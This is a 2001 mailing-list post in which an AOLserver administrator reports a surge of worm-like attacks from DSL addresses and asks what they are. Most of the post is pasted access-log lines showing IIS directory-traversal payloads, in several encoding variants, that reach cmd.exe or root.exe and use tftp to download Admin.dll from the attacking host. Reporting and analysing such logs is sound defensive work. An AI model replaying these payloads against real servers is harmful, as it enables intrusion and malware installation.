[AOLSERVER] cmd.exe attacks

Tue, 18 Sep 2001 09:01:39 -0700 

Hmm.  I've gotten 10,000 of them *today*.  Yesterday, none.

They're almost all from 66.12.* addresses (verizon dsl in california, same
as me).  This is where most of my code red attacks are (still) coming
from, probably because there's a lot of people running IIS who aren't
really even aware of it.

I'm getting 10-20 hits a second of these attacks...

Is this just a resurgence of that old hack, or something new?

Here's a random sampling from the log file:
66.12.144.187 - - [18/Sep/2001:09:19:50 -0700] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.193.108 - - [18/Sep/2001:09:19:51 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" "" 66.12.144.187 
- - [18/Sep/2001:09:19:51 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.193.108 - - [18/Sep/2001:09:19:51 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.193.108%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.193.108 - - [18/Sep/2001:09:19:52 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.193.108%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.193.108 - - [18/Sep/2001:09:19:52 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.193.108%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:52 -0700] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.193.108 - - [18/Sep/2001:09:19:52 -0700] "GET /scripts/..%252f../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:52 -0700] "GET /scripts/..%c0%af../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:19:53 -0700] "GET 
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.106.36%20GET%20Admin.dll%20c:\Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:53 -0700] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:54 -0700] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:56 -0700] "GET /scripts/..%c1%9c../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:19:57 -0700] "GET 
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.106.36%20GET%20Admin.dll%20d:\Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:57 -0700] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:57 -0700] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:58 -0700] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:59 -0700] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:00 -0700] "GET /scripts/..%%35%63../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:00 -0700] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:01 -0700] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:01 -0700] "GET 
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.106.36%20GET%20Admin.dll%20e:\Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:01 -0700] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:02 -0700] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:02 -0700] "GET /scripts/..%%35c../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:03 -0700] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:03 -0700] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:04 -0700] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:04 -0700] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:05 -0700] "GET /scripts/..%25%35%63../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:05 -0700] "GET /d/Admin.dll HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:06 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:06 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:07 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:08 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:09 -0700] "GET /scripts/..%252f../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:09 -0700] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:14 -0700] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.106.36%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:18 -0700] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.106.36%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.192.10 - - [18/Sep/2001:09:20:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:22 -0700] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.106.36%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:27 -0700] "GET /scripts/..%255c../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.36.10 - - [18/Sep/2001:09:20:27 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
200 158 "" ""
66.12.192.10 - - [18/Sep/2001:09:20:27 -0700] "GET 
/scripts/root.exe?/c+tftp%20-i%2066.12.192.10%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 
200 158 "" ""
66.12.36.10 - - [18/Sep/2001:09:20:30 -0700] "GET 
/scripts/root.exe?/c+tftp%20-i%2066.12.36.10%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 
200 158 "" ""



------------------------------------------
Rusty Brooks : http://www.rustybrooks.org/
    Spewing wisdom from every orifice
------------------------------------------

Reply via email to